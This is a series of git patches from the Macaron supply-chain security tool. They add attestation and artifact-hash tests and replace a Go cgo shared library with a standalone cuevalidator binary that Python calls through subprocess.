100644 index 000000000..ff31abf90 --- /dev/null +++ b/tests/integration/cases/github_maven_attestation_local/policy.dl @@ -0,0 +1,10 @@ +/* Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_failed(component_id, "mcn_provenance_available_1"). + +apply_policy_to("test_policy", component_id) :- + is_component(component_id, "pkg:maven/io.liftwizard/liftwizard-checkstyle@2.1.22"). diff --git a/tests/integration/cases/github_maven_attestation_local/test.yaml b/tests/integration/cases/github_maven_attestation_local/test.yaml new file mode 100644 index 000000000..d442b546c --- /dev/null +++ b/tests/integration/cases/github_maven_attestation_local/test.yaml @@ -0,0 +1,30 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Discovering GitHub attestation of a local Maven artifact but failing because the artifact is wrong. In this case + we download the artifact's POM file and save it as a JAR file. + +tags: +- macaron-python-package +- macaron-docker-image + +steps: +- name: Download artifact POM instead of the JAR + kind: shell + options: + cmd: curl --create-dirs -o ./output/.m2/repository/io/liftwizard/liftwizard-checkstyle/2.1.22/liftwizard-checkstyle-2.1.22.jar https://repo1.maven.org/maven2/io/liftwizard/liftwizard-checkstyle/2.1.22/liftwizard-checkstyle-2.1.22.pom +- name: Run macaron analyze + kind: analyze + options: + command_args: + - -purl + - pkg:maven/io.liftwizard/liftwizard-checkstyle@2.1.22 + - -rp + - https://github.com/liftwizard/liftwizard + - --local-maven-repo + - ./output/.m2 +- name: Run macaron verify-policy to verify no provenance was found + kind: verify + options: + policy: policy.dl diff --git a/tests/integration/cases/github_pypi_attestation/policy.dl b/tests/integration/cases/github_pypi_attestation/policy.dl new file mode 100644 index 000000000..960a55e88 --- /dev/null +++ b/tests/integration/cases/github_pypi_attestation/policy.dl @@ -0,0 +1,10 @@ +/* Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_provenance_available_1"). + +apply_policy_to("test_policy", component_id) :- + is_component(component_id, "pkg:pypi/toga@0.4.8"). diff --git a/tests/integration/cases/github_pypi_attestation/test.yaml b/tests/integration/cases/github_pypi_attestation/test.yaml new file mode 100644 index 000000000..7cf096192 --- /dev/null +++ b/tests/integration/cases/github_pypi_attestation/test.yaml @@ -0,0 +1,20 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Discovering attestation of a PyPI artifact on GitHub + +tags: +- macaron-python-package + +steps: +- name: Run macaron analyze + kind: analyze + options: + command_args: + - -purl + - pkg:pypi/toga@0.4.8 +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy.dl diff --git a/tests/slsa_analyzer/package_registry/test_maven_central_registry.py b/tests/slsa_analyzer/package_registry/test_maven_central_registry.py index 62b9fdca0..40b51c9ae 100644 --- a/tests/slsa_analyzer/package_registry/test_maven_central_registry.py +++ b/tests/slsa_analyzer/package_registry/test_maven_central_registry.py @@ -7,11 +7,14 @@ import os import urllib.parse from datetime import datetime +from hashlib import sha256 from pathlib import Path import pytest +from packageurl import PackageURL from pytest_httpserver import HTTPServer +from macaron.artifact.maven import construct_maven_repository_path, construct_primary_jar_file_name from macaron.config.defaults import load_defaults from macaron.errors import ConfigurationError, InvalidHTTPResponseError from macaron.slsa_analyzer.package_registry.maven_central_registry import MavenCentralRegistry @@ -35,6 +38,28 @@ def maven_central_instance() -> MavenCentralRegistry: ) +@pytest.fixture(name="maven_service") +def maven_service_(httpserver: HTTPServer, tmp_path: Path) -> None: + """Set up the Maven httpserver.""" + base_url_parsed = urllib.parse.urlparse(httpserver.url_for("")) + + user_config_input = f""" + [package_registry.maven_central] + request_timeout = 20 + search_netloc = {base_url_parsed.netloc} + search_scheme = {base_url_parsed.scheme} + registry_url_netloc = {base_url_parsed.netloc} + registry_url_scheme = {base_url_parsed.scheme} + """ + user_config_path = os.path.join(tmp_path, "config.ini") + with open(user_config_path, "w", encoding="utf-8") as user_config_file: + user_config_file.write(user_config_input) + # We don't have to worry about modifying the ``defaults`` object causing test + # pollution here, since we reload the ``defaults`` object before every test with the + # ``setup_test`` fixture. + load_defaults(user_config_path) + + def test_load_defaults(tmp_path: Path) -> None: """Test the ``load_defaults`` method.""" user_config_path = os.path.join(tmp_path, "config.ini") @@ -150,31 +175,14 @@ def test_is_detected( def test_find_publish_timestamp( resources_path: Path, httpserver: HTTPServer, - tmp_path: Path, + maven_service: dict, # pylint: disable=unused-argument purl: str, mc_json_path: str, query_string: str, expected_timestamp: str, ) -> None: """Test that the function finds the timestamp correctly.""" - base_url_parsed = urllib.parse.urlparse(httpserver.url_for("")) - maven_central = MavenCentralRegistry() - - # Set up responses of solrsearch endpoints using the httpserver plugin. - user_config_input = f""" - [package_registry.maven_central] - request_timeout = 20 - search_netloc = {base_url_parsed.netloc} - search_scheme = {base_url_parsed.scheme} - """ - user_config_path = os.path.join(tmp_path, "config.ini") - with open(user_config_path, "w", encoding="utf-8") as user_config_file: - user_config_file.write(user_config_input) - # We don't have to worry about modifying the ``defaults`` object causing test - # pollution here, since we reload the ``defaults`` object before every test with the - # ``setup_test`` fixture. - load_defaults(user_config_path) maven_central.load_defaults() with open(os.path.join(resources_path, "maven_central_files", mc_json_path), encoding="utf8") as page: @@ -208,35 +216,19 @@ def test_find_publish_timestamp( def test_find_publish_timestamp_errors( resources_path: Path, httpserver: HTTPServer, - tmp_path: Path, + maven_service: dict, # pylint: disable=unused-argument purl: str, mc_json_path: str, expected_msg: str, ) -> None: """Test that the function handles errors correctly.""" - base_url_parsed = urllib.parse.urlparse(httpserver.url_for("")) - maven_central = MavenCentralRegistry() - - # Set up responses of solrsearch endpoints using the httpserver plugin. - user_config_input = f""" - [package_registry.maven_central] - request_timeout = 20 - search_netloc = {base_url_parsed.netloc} - search_scheme = {base_url_parsed.scheme} - """ - user_config_path = os.path.join(tmp_path, "config.ini") - with open(user_config_path, "w", encoding="utf-8") as user_config_file: - user_config_file.write(user_config_input) - # We don't have to worry about modifying the ``defaults`` object causing test - # pollution here, since we reload the ``defaults`` object before every test with the - # ``setup_test`` fixture. - load_defaults(user_config_path) maven_central.load_defaults() with open(os.path.join(resources_path, "maven_central_files", mc_json_path), encoding="utf8") as page: mc_json_response = json.load(page) + # Set up responses of solrsearch endpoints using the httpserver plugin. httpserver.expect_request( "/solrsearch/select", query_string="q=g:org.apache.logging.log4j+AND+a:log4j-core+AND+v:3.0.0-beta2&core=gav&rows=1&wt=json", @@ -245,3 +237,52 @@ def test_find_publish_timestamp_errors( pat = f"^{expected_msg}" with pytest.raises(InvalidHTTPResponseError, match=pat): maven_central.find_publish_timestamp(purl=purl) + + +@pytest.mark.parametrize("purl_string", ["pkg:maven/example", "pkg:maven/example/test", "pkg:maven/example/test@1"]) +def test_get_artifact_hash_failures( + httpserver: HTTPServer, maven_service: dict, purl_string: str # pylint: disable=unused-argument +) -> None: + """Test failures of get artifact hash.""" + purl = PackageURL.from_string(purl_string) + + maven_registry = MavenCentralRegistry() + maven_registry.load_defaults() + + if purl.namespace and purl.version and (file_name := construct_primary_jar_file_name(purl)) and file_name: + artifact_path = "/" + construct_maven_repository_path(purl.namespace, purl.name, purl.version) + "/" + file_name + hash_algorithm = sha256() + hash_algorithm.update(b"example_data") + expected_hash = hash_algorithm.hexdigest() + httpserver.expect_request(artifact_path + ".sha256").respond_with_data(expected_hash) + httpserver.expect_request(artifact_path).respond_with_data(b"example_data_2") + + result = maven_registry.get_artifact_hash(purl) + + assert not result + + +def test_get_artifact_hash_success( + httpserver: HTTPServer, maven_service: dict # pylint: disable=unused-argument +) -> None: + """Test success of get artifact hash.""" + purl = PackageURL.from_string("pkg:maven/example/test@1") + assert purl.namespace + assert purl.version + + maven_registry = MavenCentralRegistry() + maven_registry.load_defaults() + + file_name = construct_primary_jar_file_name(purl) + assert file_name + + artifact_path = "/" + construct_maven_repository_path(purl.namespace, purl.name, purl.version) + "/" + file_name + hash_algorithm = sha256() + hash_algorithm.update(b"example_data") + expected_hash = hash_algorithm.hexdigest() + httpserver.expect_request(artifact_path + ".sha256").respond_with_data(expected_hash) + httpserver.expect_request(artifact_path).respond_with_data(b"example_data") + + result = maven_registry.get_artifact_hash(purl) + + assert result From 279a0013fc7b9af5a82e0ab28d90f1c360c5b90a Mon Sep 17 00:00:00 2001 From: Behnaz Hassanshahi Date: Fri, 6 Jun 2025 16:15:28 +1000 Subject: [PATCH 07/14] build: replace shared library with standalone cuevalidator binary (#1096) This PR replaces the Go shared library previously used via C-bindings in Python with a standalone binary for the cuevalidator component. The binary can now be invoked as a subprocess, simplifying integration and improving portability. Signed-off-by: behnazh-w --- Makefile | 1 - golang/README.md | 43 +++--- golang/cmd/cuevalidator/README.md | 45 ++++++ golang/cmd/cuevalidator/cuevalidator.go | 110 +++++++++++++++ golang/internal/cue_validator/cgo_helper.go | 36 ----- .../internal/cue_validator/cue_validator.go | 80 ----------- golang/internal/cuevalidator/cuevalidator.go | 61 ++++++++ .../cuevalidator_test.go} | 37 ++++- .../resources/invalid_policy.cue | 0 .../resources/invalid_provenance.json | 0 .../resources/valid_policy.cue | 0 .../resources/valid_provenance.json | 0 .../resources/valid_provenance2.json | 0 src/macaron/config/global_config.py | 4 +- .../provenance/expectations/cue/__init__.py | 4 +- .../expectations/cue/cue_validator.py | 130 ++++++++++-------- .../provenance/expectations/expectation.py | 14 +- .../expectations/cue/test_cue_validator.py | 31 +++-- 18 files changed, 374 insertions(+), 222 deletions(-) create mode 100644 golang/cmd/cuevalidator/README.md create mode 100644 golang/cmd/cuevalidator/cuevalidator.go delete mode 100644 golang/internal/cue_validator/cgo_helper.go delete mode 100644 golang/internal/cue_validator/cue_validator.go create mode 100644 golang/internal/cuevalidator/cuevalidator.go rename golang/internal/{cue_validator/cue_validator_test.go => cuevalidator/cuevalidator_test.go} (69%) rename golang/internal/{cue_validator => cuevalidator}/resources/invalid_policy.cue (100%) rename golang/internal/{cue_validator => cuevalidator}/resources/invalid_provenance.json (100%) rename golang/internal/{cue_validator => cuevalidator}/resources/valid_policy.cue (100%) rename golang/internal/{cue_validator => cuevalidator}/resources/valid_provenance.json (100%) rename golang/internal/{cue_validator => cuevalidator}/resources/valid_provenance2.json (100%) diff --git a/Makefile b/Makefile index 029cdc163..95365036e 100644 --- a/Makefile +++ b/Makefile @@ -93,7 +93,6 @@ setup: force-upgrade setup-go setup-binaries setup-schemastore go install github.com/CycloneDX/cyclonedx-gomod/cmd/cyclonedx-gomod@v1.3.0 setup-go: go build -o $(PACKAGE_PATH)/bin/ $(REPO_PATH)/golang/cmd/... - go build -o $(PACKAGE_PATH)/bin/cuevalidate.so -buildmode=c-shared $(REPO_PATH)/golang/internal/cue_validator/cue_validator.go setup-binaries: $(PACKAGE_PATH)/bin/slsa-verifier $(PACKAGE_PATH)/resources/mvnw $(PACKAGE_PATH)/resources/gradlew souffle gnu-sed $(PACKAGE_PATH)/bin/slsa-verifier: git clone --depth 1 https://github.com/slsa-framework/slsa-verifier.git -b v2.6.0 diff --git a/golang/README.md b/golang/README.md index 37f0f0d4b..4cefbe323 100644 --- a/golang/README.md +++ b/golang/README.md @@ -1,10 +1,10 @@ # Go module documentation ## Quick start Prerequisites -- Go (tested on `go1.17.8 linux/amd64`). Installation instructions [here](https://go.dev/doc/install). +- Go (tested on `go 1.23.0 linux/amd64`). Installation instructions [here](https://go.dev/doc/install). - Prepare the required libraries by running this command from the root dir of this repository: -``` +```bash go mod download ``` This command will download all packages as defined in [go.mod](../../../go.mod) and [go.sum](../../../go.sum). @@ -12,17 +12,17 @@ This command will download all packages as defined in [go.mod](../../../go.mod) ### Project layout This go module follows the Golang project layout as specified in [golang-standards/project-layout](https://github.com/golang-standards/project-layout). -``` +```bash macaron ├── golang -│ ├── cmd -│ │ └── bashparser -│ ├── internal -│ │ ├── bashparser -│ │ ├── cue_validator -│ │ └── filewriter -│ ├── pkg -│ └── README.md +│   ├── cmd +│   │   ├── bashparser +│   │   └── cuevalidator +│   ├── internal +│   │   ├── bashparser +│   │   ├── cuevalidator +│   │   └── filewriter +│   └── README.md ├── go.mod ├── go.sum └── @@ -36,32 +36,39 @@ macaron ### Run the application code directly using Go To run an application (in the `cmd` dir), from the root dir of this repository: -``` +```bash go run ./golang/cmd//.go [ARGS] ``` -For example, to run the [actionparser](./cmd/actionparser/README.md) application: -``` -go run ./golang/cmd/actionparser/actionparser.go -file ./golang/internal/actionparser/resources/valid.yaml -``` ### Run the Go tests To run all the tests, from the root dir of this repository: +```bash +make test ``` + +To just run the Go tests: +```bash go test ./golang/... ``` To run the tests and record the code coverage, from the root dir of this repository: -``` +```bash go test -cover ./golang/... ``` ### Build the executable To build an executable of an application in this module: + +```bash +make setup-go ``` + +Alternatively you can run: +```bash go build ./golang/cmd//.go ``` This will generate an executable `app_name` in the current directory. We can also change the path of the output executable by using: -``` +```bash go build -o ./golang/cmd//.go ``` diff --git a/golang/cmd/cuevalidator/README.md b/golang/cmd/cuevalidator/README.md new file mode 100644 index 000000000..4e68d7fe7 --- /dev/null +++ b/golang/cmd/cuevalidator/README.md @@ -0,0 +1,45 @@ +# CUE Validator + +This Go module validates CUE provenance against a policy and extracts analysis targets using [CUE](https://cuelang.org/). + +### Run the CUE Validator directly + +To run the validator, from the root directory of this repository: + +```bash +go run ./golang/cmd/cuevalidator/cuevalidator.go -h +``` + + +#### Commands: + +- `-target-policy `: The CUE policy path from which to extract the target. +- `-validate-policy `: The CUE policy path to validate the provenance against. +- `-validate-provenance `: The provenance payload path to validate. + +### Examples: + +1. **Extract Target from Policy** + To extract the target from a CUE policy, use the following command: + +```bash +go run ./golang/cmd/cuevalidator/cuevalidator.go -target-policy +``` + +Output: + +```bash +pkg:maven/io.micronaut/micronaut-core +``` + +2. **Validate Provenance Against Policy** +To validate provenance against a policy, use the following command: + +```bash +go run ./golang/cmd/cuevalidator/cuevalidator.go -validate-policy -validate-provenance +``` + +### Error Handling: + +- If required arguments are missing or invalid, the program will print an error message to `stderr` and exit with a non-zero status code. +- If the validation fails, an error message will be printed, and the program will exit with an appropriate error code. diff --git a/golang/cmd/cuevalidator/cuevalidator.go b/golang/cmd/cuevalidator/cuevalidator.go new file mode 100644 index 000000000..d9cff56e4 --- /dev/null +++ b/golang/cmd/cuevalidator/cuevalidator.go @@ -0,0 +1,110 @@ +/* Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +package main + +import ( + "flag" + "fmt" + "os" + + "github.com/oracle/macaron/golang/internal/cuevalidator" +) + +// Utility function to handle file reading and errors. +func readFile(path string) ([]byte, error) { + content, err := os.ReadFile(path) + if err != nil { + return nil, fmt.Errorf("failed to read file '%s': %w", path, err) + } + return content, nil +} + +// Handle validation errors. +func handleError(message string, code int) { + fmt.Fprintln(os.Stderr, message) + os.Exit(code) +} + +// Main entry point for the CUE Validator tool. +// This function processes command-line flags to execute one of the following commands: +// - Extract a target from a CUE policy (using -target-policy flag). +// - Validate provenance against a CUE policy (using -validate-policy and -validate-provenance flags). +// +// Params: +// +// -target-policy : the CUE policy to extract the target from. +// -validate-policy : the CUE policy to validate the provenance against. +// -validate-provenance : the provenance data to validate. +// +// Return code: +// +// 0 - If the target is successfully extracted or the provenance validation finishes with no errors. +// 1 - If there is a missing required argument or invalid command usage. +// 2 - If an error occurs during validation (e.g., invalid provenance or policy). +// +// Usage: +// +// 1. To extract the target from a policy: +// go run cuevalidator.go -target-policy +// Output: The extracted target will be printed to stdout. +// +// 2. To validate provenance against a policy: +// go run cuevalidator.go -validate-policy -validate-provenance +// Output: A success or failure message will be printed based on the validation result. +func main() { + // Define flags for the target command. + targetPolicy := flag.String("target-policy", "", "Path to CUE policy to extract the target from.") + + // Define flags for the validate command + validatePolicy := flag.String("validate-policy", "", "Path to CUE policy to validate against.") + validateProvenance := flag.String("validate-provenance", "", "Path to provenance data to validate.") + + // Parse flags + flag.Parse() + + // Handle 'target-policy' command. + if *targetPolicy != "" { + policyContent, err := readFile(*targetPolicy) + if err != nil { + handleError(err.Error(), 2) + } + + result := cuevalidator.Target(string(policyContent)) + if result == "" { + handleError("Error: Unable to extract target from policy.", 2) + } + + fmt.Print(result) + return + } + + // Handle 'validate' command. + if *validatePolicy != "" && *validateProvenance != "" { + policyContent, err := readFile(*validatePolicy) + if err != nil { + handleError(err.Error(), 2) + } + + provenanceContent, err := readFile(*validateProvenance) + if err != nil { + handleError(err.Error(), 2) + } + + result := cuevalidator.Validate(string(policyContent), string(provenanceContent)) + switch result { + case 1: + fmt.Print("True") + os.Exit(0) + case 0: + fmt.Print("False") + os.Exit(0) + default: + handleError("Error: Validation encountered an issue.", 2) + } + return + } + + // If no valid command was given, print usage message + handleError("Error: Missing required arguments for target or validate command.", 1) +} diff --git a/golang/internal/cue_validator/cgo_helper.go b/golang/internal/cue_validator/cgo_helper.go deleted file mode 100644 index c90984188..000000000 --- a/golang/internal/cue_validator/cgo_helper.go +++ /dev/null @@ -1,36 +0,0 @@ -/* Copyright (c) 2023 - 2023, Oracle and/or its affiliates. All rights reserved. */ -/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ - -// This module provides CGO helper functions for testing. -package main - -import ( - "C" - "os" - "path" - "runtime" - "testing" -) - -// Get the path to the resources directory. -func GetResourcesPath(t *testing.T) string { - _, filename, _, ok := runtime.Caller(1) - if !ok { - t.Errorf("Unable to locate resources.") - } - return path.Join(path.Dir(filename), "resources") -} - -// Load resource file. -func LoadResource(t *testing.T, name string) *C.char { - path := path.Join(GetResourcesPath(t), name) - content, err := os.ReadFile(path) - if err != nil { - t.Errorf("Unable to load the policy content from %s.", path) - } - return C.CString(string(content)) -} - -func GetGoString(value *C.char) string { - return C.GoString(value) -} diff --git a/golang/internal/cue_validator/cue_validator.go b/golang/internal/cue_validator/cue_validator.go deleted file mode 100644 index fe5b14306..000000000 --- a/golang/internal/cue_validator/cue_validator.go +++ /dev/null @@ -1,80 +0,0 @@ -/* Copyright (c) 2023 - 2023, Oracle and/or its affiliates. All rights reserved. */ -/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ - -// CUE Validator runs CUE and validates a provenance against a policy. -// See: https://cuelang.org/docs/about/ - -package main - -import ( - "C" - "strings" - - "cuelang.org/go/cue" - "cuelang.org/go/cue/cuecontext" - "cuelang.org/go/encoding/json" -) - -// target returns the analysis target repo for the provided policy content. -// Returns target string value if successful and nil if error has occurred. -// -//export target -func target(policy *C.char) *C.char { - ctx := cuecontext.New() - _policy := C.GoString(policy) - value := ctx.CompileString(_policy) - policy_err := value.Err() - if policy_err != nil { - return nil - } - - target_value := value.LookupPath(cue.ParsePath("target")) - target_err := target_value.Err() - if target_err != nil { - return nil - } - target_path, str_err := target_value.String() - if str_err != nil { - return nil - } - - // We need to be careful about memory leaks on the Python side. - // The documentation at https://pkg.go.dev/cmd/cgo says: - // The C string is allocated in the C heap using malloc. - // It is the caller's responsibility to arrange for it to be - // freed. - return C.CString(strings.TrimSpace(target_path)) -} - -// validate validates the provenance against a CUE policy. -// Returns 1 if policy conforms with the provenance, 0 if -// provenance is invalid, and -1 if CUE returns a validation error. -// -//export validate -func validate(policy *C.char, provenance *C.char) int32 { - _policy := C.GoString(policy) - _provenance := C.GoString(provenance) - - ctx := cuecontext.New() - value := ctx.CompileString(_policy) - - resolved_value := ctx.CompileString(_provenance, cue.Scope(value)) - res_err := resolved_value.Err() - if res_err != nil { - // Unable to process the provenance. - return -1 - } - - validate_err := json.Validate([]byte(_provenance), value) - if validate_err != nil { - // Validation failed. - return 0 - } - - // The provenance conforms with the policy. - return 1 -} - -func main() { - -} diff --git a/golang/internal/cuevalidator/cuevalidator.go b/golang/internal/cuevalidator/cuevalidator.go new file mode 100644 index 000000000..75a1ba8a4 --- /dev/null +++ b/golang/internal/cuevalidator/cuevalidator.go @@ -0,0 +1,61 @@ +/* Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +// CUE Validator runs CUE and validates a provenance against a policy. +// See: https://cuelang.org/docs/about/ + +package cuevalidator + +import ( + "strings" + + "cuelang.org/go/cue" + "cuelang.org/go/cue/cuecontext" + "cuelang.org/go/encoding/json" +) + +// Target extracts the target from a given CUE policy string. +// It returns the extracted target if successful, or an empty string if an error occurs. +func Target(policy string) string { + ctx := cuecontext.New() + value := ctx.CompileString(policy) + policyErr := value.Err() + if policyErr != nil { + return "" + } + + targetValue := value.LookupPath(cue.ParsePath("target")) + targetErr := targetValue.Err() + if targetErr != nil { + return "" + } + targetPath, strErr := targetValue.String() + if strErr != nil { + return "" + } + + return strings.TrimSpace(targetPath) +} + +// Validate validates the provenance against the given CUE policy. +// It returns 1 if the provenance conforms to the policy, 0 if it does not, and -1 if there is an unexpected error. +func Validate(policy string, provenance string) int32 { + ctx := cuecontext.New() + value := ctx.CompileString(policy) + + resolvedValue := ctx.CompileString(provenance, cue.Scope(value)) + resErr := resolvedValue.Err() + if resErr != nil { + // Unable to process the provenance. + return -1 + } + + validateErr := json.Validate([]byte(provenance), value) + if validateErr != nil { + // Validation failed. + return 0 + } + + // The provenance conforms with the policy. + return 1 +} diff --git a/golang/internal/cue_validator/cue_validator_test.go b/golang/internal/cuevalidator/cuevalidator_test.go similarity index 69% rename from golang/internal/cue_validator/cue_validator_test.go rename to golang/internal/cuevalidator/cuevalidator_test.go index c546e9fb0..a2f51ff42 100644 --- a/golang/internal/cue_validator/cue_validator_test.go +++ b/golang/internal/cuevalidator/cuevalidator_test.go @@ -1,12 +1,34 @@ -/* Copyright (c) 2023 - 2023, Oracle and/or its affiliates. All rights reserved. */ +/* Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. */ /* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ -package main +package cuevalidator import ( + "os" + "path" + "runtime" "testing" ) +// Get the path to the resources directory. +func GetResourcesPath(t *testing.T) string { + _, filename, _, ok := runtime.Caller(1) + if !ok { + t.Errorf("Unable to locate resources.") + } + return path.Join(path.Dir(filename), "resources") +} + +func LoadResource(t *testing.T, name string) string { + path := path.Join(GetResourcesPath(t), name) + data, err := os.ReadFile(path) + if err != nil { + t.Fatalf("Failed to read file: %s", err) + } + return string(data) +} + +// Test_Target tests the Target function for extracting the target from a CUE policy. func Test_Target(t *testing.T) { tests := []struct { name string @@ -16,7 +38,7 @@ func Test_Target(t *testing.T) { { name: "get target from invalid policy", path: "invalid_policy.cue", - expected: GetGoString(nil), + expected: "", }, { name: "get target from valid policy", @@ -28,16 +50,17 @@ func Test_Target(t *testing.T) { test := test // Re-initialize the test. t.Run(test.name, func(t *testing.T) { policy := LoadResource(t, test.path) - value := target(policy) + value := Target(policy) // GoLang doesn’t provide any built-in support for assert. - if GetGoString(value) != test.expected { - t.Errorf("Expected %s but got %s.", test.expected, GetGoString(value)) + if value != test.expected { + t.Errorf("Expected %s but got %s.", test.expected, value) } }) } } +// Test_ValidatePolicy tests the Validate function for validating the provenance against a CUE policy. func Test_ValidatePolicy(t *testing.T) { tests := []struct { name string @@ -82,7 +105,7 @@ func Test_ValidatePolicy(t *testing.T) { t.Run(test.name, func(t *testing.T) { policy := LoadResource(t, test.policy_path) provenance := LoadResource(t, test.provenance_path) - result := validate(policy, provenance) + result := Validate(policy, provenance) if result != test.expected { t.Errorf("Expected %d but got %d.", test.expected, result) } diff --git a/golang/internal/cue_validator/resources/invalid_policy.cue b/golang/internal/cuevalidator/resources/invalid_policy.cue similarity index 100% rename from golang/internal/cue_validator/resources/invalid_policy.cue rename to golang/internal/cuevalidator/resources/invalid_policy.cue diff --git a/golang/internal/cue_validator/resources/invalid_provenance.json b/golang/internal/cuevalidator/resources/invalid_provenance.json similarity index 100% rename from golang/internal/cue_validator/resources/invalid_provenance.json rename to golang/internal/cuevalidator/resources/invalid_provenance.json diff --git a/golang/internal/cue_validator/resources/valid_policy.cue b/golang/internal/cuevalidator/resources/valid_policy.cue similarity index 100% rename from golang/internal/cue_validator/resources/valid_policy.cue rename to golang/internal/cuevalidator/resources/valid_policy.cue diff --git a/golang/internal/cue_validator/resources/valid_provenance.json b/golang/internal/cuevalidator/resources/valid_provenance.json similarity index 100% rename from golang/internal/cue_validator/resources/valid_provenance.json rename to golang/internal/cuevalidator/resources/valid_provenance.json diff --git a/golang/internal/cue_validator/resources/valid_provenance2.json b/golang/internal/cuevalidator/resources/valid_provenance2.json similarity index 100% rename from golang/internal/cue_validator/resources/valid_provenance2.json rename to golang/internal/cuevalidator/resources/valid_provenance2.json diff --git a/src/macaron/config/global_config.py b/src/macaron/config/global_config.py index 8befb4045..0ef2c2849 100644 --- a/src/macaron/config/global_config.py +++ b/src/macaron/config/global_config.py @@ -94,12 +94,12 @@ def load_expectation_files(self, exp_path: str) -> None: exp_files = [] if os.path.isdir(exp_path): for policy_path in os.listdir(exp_path): - policy_file_path = os.path.join(exp_path, policy_path) + policy_file_path = os.path.abspath(os.path.join(exp_path, policy_path)) if os.path.isfile(policy_file_path): exp_files.append(policy_file_path) logger.info("Added provenance expectation file %s", os.path.relpath(policy_file_path, os.getcwd())) elif os.path.isfile(exp_path): - exp_files.append(exp_path) + exp_files.append(os.path.abspath(exp_path)) logger.info("Added provenance expectation file %s", os.path.relpath(exp_path, os.getcwd())) self.expectation_paths = exp_files diff --git a/src/macaron/slsa_analyzer/provenance/expectations/cue/__init__.py b/src/macaron/slsa_analyzer/provenance/expectations/cue/__init__.py index c457d316f..2f8caf3de 100644 --- a/src/macaron/slsa_analyzer/provenance/expectations/cue/__init__.py +++ b/src/macaron/slsa_analyzer/provenance/expectations/cue/__init__.py @@ -66,9 +66,9 @@ def make_expectation(cls, expectation_path: str) -> Self | None: with open(expectation_path, encoding="utf-8") as expectation_file: expectation.text = expectation_file.read() expectation.sha = str(hashlib.sha256(expectation.text.encode("utf-8")).hexdigest()) - expectation.target = cue_validator.get_target(expectation.text) + expectation.target = cue_validator.get_target(expectation_path) expectation._validator = ( # pylint: disable=protected-access - lambda provenance: cue_validator.validate_expectation(expectation.text, provenance) + lambda provenance_path: cue_validator.validate_expectation(expectation_path, provenance_path) ) except (OSError, CUERuntimeError, CUEExpectationError) as error: logger.error("CUE expectation error: %s", error) diff --git a/src/macaron/slsa_analyzer/provenance/expectations/cue/cue_validator.py b/src/macaron/slsa_analyzer/provenance/expectations/cue/cue_validator.py index 70e203af8..fc7e92c1b 100644 --- a/src/macaron/slsa_analyzer/provenance/expectations/cue/cue_validator.py +++ b/src/macaron/slsa_analyzer/provenance/expectations/cue/cue_validator.py @@ -1,28 +1,23 @@ -# Copyright (c) 2023 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """The cue module invokes the CUE schema validator.""" -import ctypes -import json import os -from collections.abc import Callable +import subprocess # nosec B404 from macaron import MACARON_PATH +from macaron.config.defaults import defaults from macaron.errors import CUEExpectationError, CUERuntimeError -from macaron.json_tools import JsonType -# Load the CUE shared library. -cue = ctypes.CDLL(os.path.join(MACARON_PATH, "bin", "cuevalidate.so")) - -def get_target(expectation: str | None) -> str: +def get_target(expectation_path: str | None) -> str: """Get the analysis target of the expectation. Parameters ---------- - expectation: str | None - The cue expectation content. + expectation_path: str | None + The cue expectation path. Returns ------- @@ -34,42 +29,45 @@ def get_target(expectation: str | None) -> str: CUERuntimeError, CUEExpectationError If expectation is invalid or unable to get the target by invoking the shared library. """ - if not expectation: - raise CUEExpectationError("CUE expectation is empty.") - - cue.target.restype = ctypes.c_void_p - - def _errcheck( - result: ctypes.c_void_p, func: Callable, args: tuple # pylint: disable=unused-argument - ) -> ctypes.c_void_p: - if not result: - raise CUERuntimeError("Unable to find target field in CUE expectation.") - return result - - cue.target.errcheck = _errcheck # type: ignore - expectation_buffer = ctypes.create_string_buffer(bytes(expectation, encoding="utf-8")) - target_ptr = cue.target(expectation_buffer) - res_bytes = ctypes.string_at(target_ptr) - - # Even though Python & Go have a garbage collector that will free up unused memory, - # the documentation says it is the caller's responsibility to free up the C string - # allocated memory. See https://pkg.go.dev/cmd/cgo - free = cue.free - free.argtypes = [ctypes.c_void_p] - free(target_ptr) - - return res_bytes.decode("utf-8") - - -def validate_expectation(expectation: str | None, prov: JsonType) -> bool: + if not expectation_path: + raise CUEExpectationError("CUE expectation path is not provided.") + + cmd = [ + os.path.join(MACARON_PATH, "bin", "cuevalidator"), + "-target-policy", + expectation_path, + ] + + try: + result = subprocess.run( # nosec B603 + cmd, + capture_output=True, + check=True, + cwd=MACARON_PATH, + timeout=defaults.getint("cue_validator", "timeout", fallback=30), + ) + except ( + subprocess.CalledProcessError, + subprocess.TimeoutExpired, + FileNotFoundError, + ) as error: + raise CUERuntimeError("Unable to process CUE expectation.") from error + + if result.returncode == 0: + return result.stdout.decode("utf-8") + + raise CUEExpectationError("Unable to find target field in CUE expectation.") + + +def validate_expectation(expectation_path: str, prov_stmt_path: str) -> 